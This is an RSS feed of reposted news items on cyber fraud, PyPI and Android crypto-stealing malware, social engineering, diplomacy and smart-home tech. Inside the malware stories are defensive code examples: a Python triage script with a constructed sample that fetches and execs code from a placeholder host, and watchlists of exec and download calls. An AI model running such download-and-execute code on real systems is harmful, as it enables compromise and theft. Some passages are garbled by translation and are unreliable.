<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: sarnews</title>
    <description>The latest articles on DEV Community by sarnews (@sarnews).</description>
    <link>https://dev.to/sarnews</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F2144727%2Fd9714980-c7d7-4835-89b4-76b5d153f38c.png</url>
      <title>DEV Community: sarnews</title>
      <link>https://dev.to/sarnews</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/sarnews"/>
    <language>en</language>
    <item>
      <title>Bankers’ involvement suspected in 7cr hacking scam | Ahmedabad News - The Times of India</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Sun, 16 Feb 2025 14:34:01 +0000</pubDate>
      <link>https://dev.to/sarnews/bankers-involvement-suspected-in-7cr-hacking-scam-ahmedabad-news-the-times-of-india-30oh</link>
      <guid>https://dev.to/sarnews/bankers-involvement-suspected-in-7cr-hacking-scam-ahmedabad-news-the-times-of-india-30oh</guid>
      <description>&lt;p&gt;Ahmedabad's city crime branch is investigating a significant cyber fraud involving online casinos and e-commerce platforms. They have arrested three main suspectsVijay Vaghela, Nitesh Madta, and Adil Parmarconnected to a Rs 7 crore scam. These individuals hacked websites, manipulated payment systems, and created fake client IDs to alter betting outcomes. The suspects allegedly bribed bank employees for unique transaction reference (UTR) codes to withdraw money from gaming apps. Authorities are also looking into the hacking of a popular gambling app and plan to issue legal notices. The crime branch seized mobile phones and valuables worth Rs 3. 31 lakh and charged the trio under multiple legal acts.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>AI-Powered Social Engineering: Ancillary Tools and Techniques</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Fri, 14 Feb 2025 15:26:41 +0000</pubDate>
      <link>https://dev.to/sarnews/ai-powered-social-engineering-ancillary-tools-and-techniques-54jb</link>
      <guid>https://dev.to/sarnews/ai-powered-social-engineering-ancillary-tools-and-techniques-54jb</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F207n2mwdm09e3ouoew58.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F207n2mwdm09e3ouoew58.png" alt="Image description" width="728" height="380"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Social engineering is rapidly evolving, with generative AI providing cybercriminals new tools for targeting organizations, as highlighted by the FBI's acknowledgment of changing tactics. This article investigates the implications of this acceleration and its impact on IT leaders tasked with safeguarding systems. &lt;/p&gt;

&lt;p&gt;Classic social engineering often involves impersonating known individuals over email, exploiting urgency or authority to manipulate targets. When the channel is voice, attackers have had to rely on voices unfamiliar to the target to gain trust, and these tactics can falter as soon as the target pursues identity verification.&lt;/p&gt;

&lt;p&gt;With the emergence of generative AI, deepfake technology lets adversaries produce convincing impersonations, splicing real recordings to recreate a person's speech and mannerisms. Combined with the rise of remote interactions, this obscures the usual warning signs, since odd behaviour can be dismissed as a technical glitch. Voice cloning in particular has strengthened voice phishing (vishing), to the point that organizations such as OpenAI have recommended abandoning voice-based authentication for sensitive access, a clear escalation of the social engineering threat.&lt;br&gt;
Text-based communication is transformed by GenAI as well: it lets malicious actors operate at a near-native level in the target's language, even capturing regional dialects. This widens the field for social engineering attacks, since language is no longer an obstacle when choosing targets. Everyone leaves a digital trail online, and the information shared there can be enough to impersonate or compromise someone's identity. GenAI can now rapidly collect and organize unstructured data, analysing social networks and photos to build profiles that are useful for attacks; such profiles can be used for extortion or to steal intellectual property. With massive data leaks such as the one affecting 3 billion Yahoo users, attackers can use GenAI tools to automate the search for and classification of information that can be put to malicious use, easing their task while preserving their anonymity.&lt;br&gt;
AI uses named-entity recognition to identify the authors of documents and establish incriminating connections, for instance through money transfers and confidential discussions. Open-source tools such as Recon-ng, configurable for tasks like open-source intelligence (OSINT) gathering, coexist with tools not available to the public, such as Red Reaper, an espionage AI capable of sifting through thousands of emails to detect sensitive information. With the rise of GenAI, attackers exploit the Internet as a database, using seed information to build connections in real time. The democratization of hacking tools, many of them automated, is reshaping the landscape and making the threat far more accessible to cybercriminals. To find out what compromising information may exist about your organization, a threat-monitoring tool has been developed to crawl the Internet and identify exploitable data before an attacker uses it.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Researchers Uncover Python Package Targeting Crypto Wallets with Malicious Code</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Thu, 31 Oct 2024 13:27:01 +0000</pubDate>
      <link>https://dev.to/sarnews/researchers-uncover-python-package-targeting-crypto-wallets-with-malicious-code-3fgp</link>
      <guid>https://dev.to/sarnews/researchers-uncover-python-package-targeting-crypto-wallets-with-malicious-code-3fgp</guid>
      <description>&lt;p&gt;Cybersecurity researchers have discovered a new malicious Python package that masquerades as a cryptocurrency trading tool but harbors functionality designed to steal sensitive data and drain assets from victims' crypto wallets.&lt;/p&gt;

&lt;p&gt;The package, named "CryptoAITools," is said to have been distributed via both Python Package Index (PyPI) and bogus GitHub repositories. It was downloaded over 1,300 times before being taken down from PyPI.&lt;/p&gt;

&lt;p&gt;"The malware activated automatically upon installation, targeting both Windows and macOS operating systems," Checkmarx said in a new report shared with The Hacker News. "A deceptive graphical user interface (GUI) was used to distract vic4ms while the malware performed its malicious ac4vi4es in the background."&lt;/p&gt;

&lt;p&gt;The package is designed to unleash its malicious behavior immediately after installation through code injected into its "__init__.py" file, which first determines whether the target system is Windows or macOS in order to execute the appropriate version of the malware.&lt;/p&gt;

&lt;p&gt;Present within the code is a helper functionality that's responsible for downloading and executing additional payloads, thereby kicking-off a multi-stage infection process.&lt;/p&gt;

&lt;p&gt;Specifically, the payloads are downloaded from a fake website ("coinsw[.]app") that advertises a cryptocurrency trading bot service, but is in fact an attempt to give the domain a veneer of legitimacy should a developer decide to navigate to it directly on a web browser.&lt;/p&gt;

&lt;p&gt;This approach not only helps the threat actor evade detection, but also allows them to expand the malware's capabilities at will by simply modifying the payloads hosted on the legitimate-looking website.&lt;/p&gt;
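&lt;p&gt;The behaviour described above, an import-time OS check followed by download and execution of a remote payload, is a pattern that can be triaged statically before a package is ever imported. The following is an added example, not code from the page, from Checkmarx, or from the CryptoAITools package: it parses a module's source with the standard-library ast module, lists the statements that would run on import, and flags calls matching the downloader pattern. The sample __init__.py embedded at the bottom is constructed for the demonstration (its URL uses the reserved .invalid TLD and never resolves).&lt;/p&gt;

```python
"""Static triage of a Python package for import-time download-and-execute.

Added example: not Checkmarx's tooling and not the CryptoAITools source.
It uses only the standard-library ast module, so it runs offline.
"""
import ast

# Call names a benign __init__.py rarely needs at import time.  A hit is a
# triage lead to read the code by hand, not proof of malice.
OS_CHECKS = {"platform.system", "platform.platform", "sys.platform"}
DOWNLOADERS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "http.client.HTTPSConnection"}
EXECUTORS = {"exec", "eval", "compile", "os.system", "os.popen",
             "subprocess.run", "subprocess.call", "subprocess.Popen"}
OBFUSCATION = {"base64.b64decode", "zlib.decompress", "codecs.decode"}
WATCHLIST = OS_CHECKS | DOWNLOADERS | EXECUTORS | OBFUSCATION


def _dotted_name(node):
    """Return 'pkg.attr.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _runs_code(stmt):
    """True if a module-level statement executes something on import."""
    if isinstance(stmt, (ast.Import, ast.ImportFrom, ast.FunctionDef,
                         ast.AsyncFunctionDef, ast.ClassDef)):
        return False
    if isinstance(stmt, ast.Expr) and isinstance(stmt.value, ast.Constant):
        return False  # module docstring or a bare literal
    if isinstance(stmt, (ast.Assign, ast.AnnAssign)):
        # VERSION = "1.0" is harmless; KEY = fetch(...) is not.
        return any(isinstance(n, ast.Call) for n in ast.walk(stmt))
    return True


def triage_init(source):
    """Report import-time statements and watchlisted calls in module source."""
    tree = ast.parse(source)
    hits = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
        elif isinstance(node, ast.Attribute):
            name = _dotted_name(node)  # also catches reads such as sys.platform
        else:
            continue
        if name in WATCHLIST:
            hits.add((node.lineno, name))
    names = {name for _, name in hits}
    # Anything at module scope runs on `import pkg`, so the victim never has
    # to call a function for the payload to fire.
    import_time = [type(s).__name__ for s in tree.body if _runs_code(s)]
    verdict = bool(import_time and names.intersection(DOWNLOADERS)
                   and names.intersection(EXECUTORS))
    return {
        "hits": sorted(hits),
        "import_time_statements": import_time,
        "download_and_execute_on_import": verdict,
    }


# Constructed sample mimicking the pattern described in the article; the
# .invalid TLD is reserved and never resolves.
SAMPLE_INIT = '''\
import platform
import urllib.request

def _fetch(url):
    return urllib.request.urlopen(url).read()

if platform.system() == "Windows":
    exec(_fetch("https://example.invalid/win"))
elif platform.system() == "Darwin":
    exec(_fetch("https://example.invalid/mac"))
'''

if __name__ == "__main__":
    print(triage_init(SAMPLE_INIT))
```

&lt;p&gt;Run it over an unpacked wheel or sdist obtained with pip download rather than after a normal install, since setup.py executes during a source install and __init__.py executes on first import. A hit means "read this file by hand"; the absence of hits means nothing, as the page itself notes that later stages are fetched from a remote server and can be changed at will.&lt;/p&gt;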

&lt;p&gt;A notable aspect of the infection process is the incorporation of a GUI component that serves to distract the victims by means of a fake setup process while the malware is covertly harvesting sensitive data from the systems.&lt;/p&gt;

&lt;p&gt;"The CryptoAITools malware conducts an extensive data theft operation, targeting a wide range of sensitive information on the infected system," Checkmarx said. "The primary goal is to gather any data that could aid the attacker in stealing cryptocurrency assets."&lt;/p&gt;

&lt;p&gt;This includes data from cryptocurrency wallets (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passwords, cookies, browsing history, cryptocurrency extensions, SSH keys, files stored in Downloads, Documents, Desktop directories that reference cryptocurrencies, passwords, and financial information, and Telegram.&lt;/p&gt;

&lt;p&gt;On Apple macOS machines, the stealer also takes the step of collecting data from Apple Notes and Stickies apps. The gathered information is ultimately uploaded to the gofile[.]io file transfer service, after which the local copy is deleted.&lt;/p&gt;

&lt;p&gt;Checkmarx said it also discovered the threat actor distributing the same stealer malware through a GitHub repository named Meme Token Hunter Bot that claims to be "an AI-powered trading bot that lists all meme tokens on the Solana network and performs real-time trades once they are deemed safe."&lt;/p&gt;

&lt;p&gt;This indicates that the campaign is also targeting cryptocurrency users who opt to clone and run the code directly from GitHub. The repository, which is still active as of writing, has been forked once and starred 10 times.&lt;/p&gt;

&lt;p&gt;Also managed by the operators is a Telegram channel that promotes the aforementioned GitHub repository, as well as offers monthly subscriptions and technical support.&lt;/p&gt;

&lt;p&gt;"This multi-platform approach allows the attacker to cast a wide net, potentially reaching victims who might be cautious about one platform but trust another," Checkmarx said.&lt;/p&gt;

&lt;p&gt;"The CryptoAITools malware campaign has severe consequences for victims and the broader cryptocurrency community. Users who starred or forked the malicious 'Meme-Token-Hunter-Bot' repository are potential victims, significantly expanding the attack's reach."&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Maldivian president Mohamed Muizzu to visit India from October 6-10</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Fri, 04 Oct 2024 13:45:58 +0000</pubDate>
      <link>https://dev.to/sarnews/maldivian-president-mohamed-muizzu-to-visit-india-from-october-6-10-4hbj</link>
      <guid>https://dev.to/sarnews/maldivian-president-mohamed-muizzu-to-visit-india-from-october-6-10-4hbj</guid>
      <description>&lt;p&gt;This will be Muizzu’s first bilateral visit to India, though he came to New Delhi in June to attend Modi’s swearing-in ceremony.&lt;br&gt;
Maldivian President Mohamed Muizzu will visit India from October 6-10 to hold talks with Prime Minister Narendra Modi, with the external affairs ministry saying on Friday the trip is expected to give momentum to bilateral cooperation and ties.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxt8v4jsqedbiq7fqac4i.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxt8v4jsqedbiq7fqac4i.png" alt="Image description" width="550" height="309"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The trip has been given the status of a state visit, signalling New Delhi’s intention to reset bilateral ties after an acrimonious period in the relationship, people familiar with the matter said on condition of anonymity. This will be Muizzu’s first bilateral visit to India, though he came to New Delhi in June to attend Modi’s swearing-in ceremony along with leaders of six other regional countries.&lt;/p&gt;

&lt;p&gt;Muizzu, who became president in November 2023 on the back of an ‘India Out’ campaign, took steps to reduce the Maldives’ dependence on India and demanded the removal of some 85 Indian military personnel deployed in the Indian Ocean archipelago to operate three aircraft. These measures took bilateral ties to a fresh low at the end of last year.&lt;/p&gt;

&lt;p&gt;However, there have been signs of a thaw in the relationship in recent months. Maldivian foreign minister Moosa Zameer visited India in May and this was followed by a trip to Maldives by external affairs minister S Jaishankar in August. In September, New Delhi helped Male avoid the risk of defaulting on Islamic bond payments by extending its subscription to government treasury bills worth $50 million for another year.&lt;/p&gt;

&lt;p&gt;“The visit of President Muizzu to India after the recent visit of the external affairs minister to Maldives is testimony to the importance that India attaches to its relations with the Maldives and is expected to lend further momentum to cooperation and robust people-to-people ties between the two countries,” external affairs ministry spokesperson Randhir Jaiswal told a media briefing.&lt;/p&gt;

&lt;p&gt;Jaiswal described the Maldives as India’s “key maritime neighbour” in the Indian Ocean and said it holds a special place in the SAGAR (Security and Growth for All in the Region) vision and India’s ‘Neighbourhood First’ policy.&lt;/p&gt;

&lt;p&gt;A statement from Muizzu’s office in Male said his discussions in India will “focus on strengthening bilateral cooperation and further enhancing the longstanding relationship between the two nations”. Muizzu is committed to “enhancing bilateral ties with nations that play a crucial role in the development and growth of the Maldives, ensuring a dynamic and proactive foreign policy for the nation”, the statement said.&lt;/p&gt;

&lt;p&gt;Besides holding talks with Modi on bilateral, regional and international issues, Muizzu will meet President Droupadi Murmu. He will travel to Mumbai and Bengaluru to attend business events. Muizzu will also interact with a sizeable Maldivian diaspora in Bengaluru.&lt;/p&gt;

&lt;p&gt;Muizzu, known for his pro-China leanings, too has dialled down the rhetoric against India in recent weeks. While visiting the US to attend the United Nations General Assembly last month, he said during an interaction at Princeton University that the Maldives only had a problem with the presence of foreign military personnel on its soil and wasn’t against any country.&lt;/p&gt;

&lt;p&gt;“We have never been against any one country at any point. It’s not ‘India Out’. The Maldives faced a serious problem with foreign military presence on its soil,” he said. “The people of the Maldives do not want a single foreign soldier in the country.”&lt;/p&gt;

&lt;p&gt;Muizzu said he had taken action against ministers for making remarks on social media that were perceived as insulting to Modi. “No one should say such a thing. I took action against it. I will not accept insulting anyone like that, whether he is a leader or an ordinary person,” he said.&lt;/p&gt;

&lt;p&gt;Last month, two junior ministers, who were suspended in January for derogatory comments against Modi, resigned from the government on the same day that Muizzu’s spokesperson announced he would visit India “very soon”.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Interpol arrests eight in major crackdown on phishing and romance scams in West Africa</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Thu, 03 Oct 2024 12:14:48 +0000</pubDate>
      <link>https://dev.to/sarnews/interpol-arrests-eight-in-major-crackdown-on-phishing-and-romance-scams-in-west-africa-3c36</link>
      <guid>https://dev.to/sarnews/interpol-arrests-eight-in-major-crackdown-on-phishing-and-romance-scams-in-west-africa-3c36</guid>
      <description>&lt;p&gt;Interpol announced eight arrests in Côte d'Ivoire and Nigeria as part of its fight against phishing and cyber-romance scams.&lt;/p&gt;

&lt;p&gt;The effort, called "Operation Contender 2.0," aims to combat cybercrime in West Africa, the agency said. One such threat was a large-scale phishing scam targeting Swiss citizens that resulted in financial losses of over $1.4 million.&lt;/p&gt;

&lt;p&gt;The cybercriminals posed as customers on small classified-advertising sites and used QR codes to direct their victims to fraudulent sites imitating a legitimate payment platform, where victims could unwittingly enter personal information such as account details and card numbers. The criminals also posed as customer service agents to deceive them further. Swiss authorities reportedly received approximately 260 fraud reports between August 2023 and April 2024 and launched a joint investigation that traced the origins of the campaign to Côte d'Ivoire.&lt;/p&gt;

&lt;p&gt;The main suspect in the attack admitted to participating in the scheme and making illegal financial benefits of over $1.9 million. Five other individuals conducting cybercriminal activities at the same location have also been arrested.&lt;/p&gt;

&lt;p&gt;Phishing and Romance Fraud&lt;br&gt;
In a separate case, authorities said they apprehended a suspect and an accomplice in Nigeria on April 27, 2024, in connection with a romance scam, after Finnish authorities alerted the Nigerian Police Force via INTERPOL that a victim had been scammed out of a "substantial amount of money."&lt;/p&gt;

&lt;p&gt;Such financial grooming crimes involve scammers creating fake online identities on dating apps and social media platforms to develop romantic or close relationships with prospective victims, only to steal money from them. "With increasing dependence on technology in every aspect of everyday life, cybercriminals are using various data-theft methods to carry out fraudulent acts," said Neil Jetton.&lt;/p&gt;

&lt;p&gt;\ "This is a recent successful cooperation under the sponsorship of competitors 2.0, indicating the importance of translating criminals into justice in pursuit of international cooperation in the battle with cyber crimes. "&lt;/p&gt;

&lt;p&gt;Separately, the U.S. Department of Justice (DOJ) said that John Adegbo, a 45-year-old dual national of Nigeria and the United Kingdom, has been sentenced to seven years in prison for his role in a multi-million dollar business email compromise (BEC) scheme. Adegbo "conspired with others to participate in several BEC cyber schemes that resulted in the loss of more than $1.9 million from the University of North Carolina and attempted to steal more than $3 million from victim organizations in Texas, including local governments, construction companies, and the University of Houston," the DOJ said in a statement. The news also follows Meta's announcement that it is partnering with UK banks to combat fraud on its platforms through an information-sharing program called the Fraud Intelligence Reciprocal Exchange (FIRE).&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Google continues to weave Thread into smart homes</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Mon, 30 Sep 2024 09:40:48 +0000</pubDate>
      <link>https://dev.to/sarnews/google-continues-to-weave-thread-into-smart-homes-37k8</link>
      <guid>https://dev.to/sarnews/google-continues-to-weave-thread-into-smart-homes-37k8</guid>
      <description>&lt;p&gt;Ryan Daws is an editor -editor of TechForge Media, who has more than 10 years of experience to develop a compelling story and complicate the subjects. His articles and interviews with industry leaders are recognized by an organization like Onalytica as an important influencer. Under his leadership, analyst firms such as Forrester have praised publications for their excellence and performance. Contact me at X (@gadget_ry) or Mastodon (@&lt;a href="mailto:gadgetry@techhub.social"&gt;gadgetry@techhub.social&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;Google continues to integrate Thread technology into the very fabric of its ecosystem to increase smart home connectivity. Recent publications and revelations indicate that tech giants are betting big on Thread and Matter as the foundation for the future of the connected home.&lt;/p&gt;

&lt;p&gt;The latest Pixel 9 series and Google TV Streamer have Thread radios built in, which could act as a central hub for controlling smart devices. But Google's ambitions don't stop there: the sleuths at Android Authority discovered some crucial clues in the recent Google Play Services beta (v24.38) that hint at deeper Thread integration in the future. Strings mentioning “Thread Networks” and “Thread Networks Control Center” have been spotted in the beta code, indicating Google’s intention to turn Play Services into a Thread network management hub.&lt;/p&gt;

&lt;p&gt;This latest development aligns with the company's ongoing efforts to streamline Thread network setup, including a cloud backup feature for Thread credentials and support for the Thread Group's credential-sharing initiative. Full Thread integration remains under wraps, but it is clear that Google is playing a long game. Industry observers predict that Thread radios will become common in smart home gadgets and mobile devices over the next few years. For the uninitiated, Thread is a low-power mesh networking protocol that uses IEEE 802.15.4 radios in the 2.4 GHz band. It can be deployed worldwide and serves as one of the transports for the Matter smart home standard. It promises snappier, more efficient device-to-device communication than conventional Wi-Fi or Bluetooth, though it requires purpose-built hardware. Matter, in turn, acts as a universal translator for smart home devices, aiming to break down the barriers between competing ecosystems such as Amazon Alexa, Google Home, Apple HomeKit and Samsung SmartThings. The end goal? A harmonious smart home where devices work well together regardless of brand loyalty.&lt;/p&gt;

&lt;p&gt;It is clear that Google continues to champion these technologies as the foundation of a more efficient and practical smart home, one in which Thread and Matter are increasingly the common ground.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign</title>
      <dc:creator>sarnews</dc:creator>
      <pubDate>Mon, 30 Sep 2024 05:35:26 +0000</pubDate>
      <link>https://dev.to/sarnews/crypto-scam-app-disguised-as-walletconnect-steals-70k-in-five-month-campaign-14gi</link>
      <guid>https://dev.to/sarnews/crypto-scam-app-disguised-as-walletconnect-steals-70k-in-five-month-campaign-14gi</guid>
      <description>&lt;p&gt;Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.&lt;/p&gt;

&lt;p&gt;The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.&lt;/p&gt;

&lt;p&gt;"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.&lt;/p&gt;

&lt;p&gt;Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.&lt;/p&gt;

&lt;p&gt;The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi &amp;amp; NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).&lt;/p&gt;

&lt;p&gt;While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.&lt;/p&gt;

&lt;p&gt;The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionality.&lt;/p&gt;

&lt;p&gt;However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.&lt;/p&gt;

&lt;p&gt;Once installed, the fake WalletConnect app redirects users to a bogus website that checks their IP address and User-Agent string and, if they match the targeting criteria, redirects them a second time to another site that mimics Web3Inbox.&lt;/p&gt;

&lt;p&gt;Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.&lt;/p&gt;

&lt;p&gt;Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.&lt;/p&gt;

&lt;p&gt;The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver[.]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.&lt;/p&gt;

&lt;p&gt;"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.&lt;/p&gt;

&lt;p&gt;"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."&lt;/p&gt;

&lt;p&gt;In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.&lt;/p&gt;

&lt;p&gt;This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.&lt;/p&gt;
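&lt;p&gt;The approval-then-sweep sequence described in the last few paragraphs is visible in the transaction calldata a wallet asks the user to sign. The following is an added example, not code from the page, from Check Point, or from the scam app: it encodes and decodes the ERC-20 approve and transferFrom calls involved, flags an approval to an unrecognised spender (the grant the drainer depends on), and builds the approve(spender, 0) call that revokes it. The two attacker addresses are the ones quoted above; the allowlisted spender and the victim wallet used in demo() are made up. It runs in Node with no dependencies, since the ERC-20 selectors are fixed constants and no chain access is needed.&lt;/p&gt;

```javascript
// Added example: not code from the page, from Check Point, or from the scam
// app.  Shows what the "verify your wallet" transaction described above asks
// the victim to sign, and how a client can inspect calldata before signing.

// Four-byte ERC-20 function selectors (first 4 bytes of keccak256 of the
// signature).  These are fixed, well-known constants, so no hashing library
// is needed.
const SELECTORS = {
  "0x095ea7b3": "approve(address,uint256)",
  "0xa9059cbb": "transfer(address,uint256)",
  "0x23b872dd": "transferFrom(address,address,uint256)",
};
const MAX_UINT256 = 2n ** 256n - 1n; // the "unlimited" allowance

// Attacker addresses as quoted in the article.
const DRAINER_SPENDER = "0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF"; // granted by approve()
const DRAINER_SINK = "0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1";    // receives transferFrom()

function strip(hex) { return hex.toLowerCase().replace(/^0x/, ""); }
function addrWord(addr) { return strip(addr).padStart(64, "0"); }   // left-pad to 32 bytes
function uintWord(n) { return n.toString(16).padStart(64, "0"); }    // n is a BigInt

// ABI-encode approve(spender, amount): selector + two 32-byte words.
function encodeApprove(spender, amount) {
  return "0x095ea7b3" + addrWord(spender) + uintWord(amount);
}

// ABI-encode the transferFrom(from, to, amount) the attacker sends afterwards.
function encodeTransferFrom(from, to, amount) {
  return "0x23b872dd" + addrWord(from) + addrWord(to) + uintWord(amount);
}

// Decode calldata into a readable call, or { fn: null } for an unknown selector.
function decodeCalldata(data) {
  const hex = strip(data);
  const selector = "0x" + hex.slice(0, 8);
  const words = hex.slice(8).match(/.{64}/g) || [];
  function addr(w) { return "0x" + w.slice(24); }
  function uint(w) { return BigInt("0x" + w); }
  switch (SELECTORS[selector]) {
    case "approve(address,uint256)":
      return { fn: "approve", spender: addr(words[0]), amount: uint(words[1]) };
    case "transfer(address,uint256)":
      return { fn: "transfer", to: addr(words[0]), amount: uint(words[1]) };
    case "transferFrom(address,address,uint256)":
      return { fn: "transferFrom", from: addr(words[0]), to: addr(words[1]), amount: uint(words[2]) };
    default:
      return { fn: null, selector: selector };
  }
}

// The check to apply before signing: an approval to a spender you do not
// recognise, above all an unlimited one, is exactly the grant the drainer needs.
function assessApproval(data, trustedSpenders) {
  const d = decodeCalldata(data);
  if (d.fn !== "approve") return { risky: false, reason: "not an approval" };
  if (trustedSpenders.map(strip).includes(strip(d.spender))) {
    return { risky: false, reason: "spender is allowlisted" };
  }
  const size = d.amount === MAX_UINT256 ? "unlimited" : d.amount.toString();
  return { risky: true, reason: size + " approval to unknown spender " + d.spender };
}

// Revocation is approve(spender, 0) sent to the same token contract.
function revokeCalldata(spender) {
  return encodeApprove(spender, 0n);
}

// Walk through the campaign's sequence; the victim wallet 0x2222... is made up.
function demo() {
  const victim = "0x2222222222222222222222222222222222222222";
  const grant = encodeApprove(DRAINER_SPENDER, MAX_UINT256);
  return {
    grant: assessApproval(grant, ["0x1111111111111111111111111111111111111111"]),
    sweep: decodeCalldata(encodeTransferFrom(victim, DRAINER_SINK, 1000n)),
    revoke: decodeCalldata(revokeCalldata(DRAINER_SPENDER)),
  };
}
```

&lt;p&gt;The same decoding applies to any dApp prompt: a wallet that shows the decoded spender and amount instead of raw hex makes an unlimited approval to an unknown address look nothing like a harmless "verify wallet" step. Revocation has to be sent per token contract from the victim's own address, and it only stops future sweeps; tokens already moved to the sink address are gone.&lt;/p&gt;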

&lt;p&gt;Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.&lt;/p&gt;

&lt;p&gt;"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.&lt;/p&gt;

&lt;p&gt;"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."&lt;/p&gt;


</description>
    </item>
  </channel>
</rss>
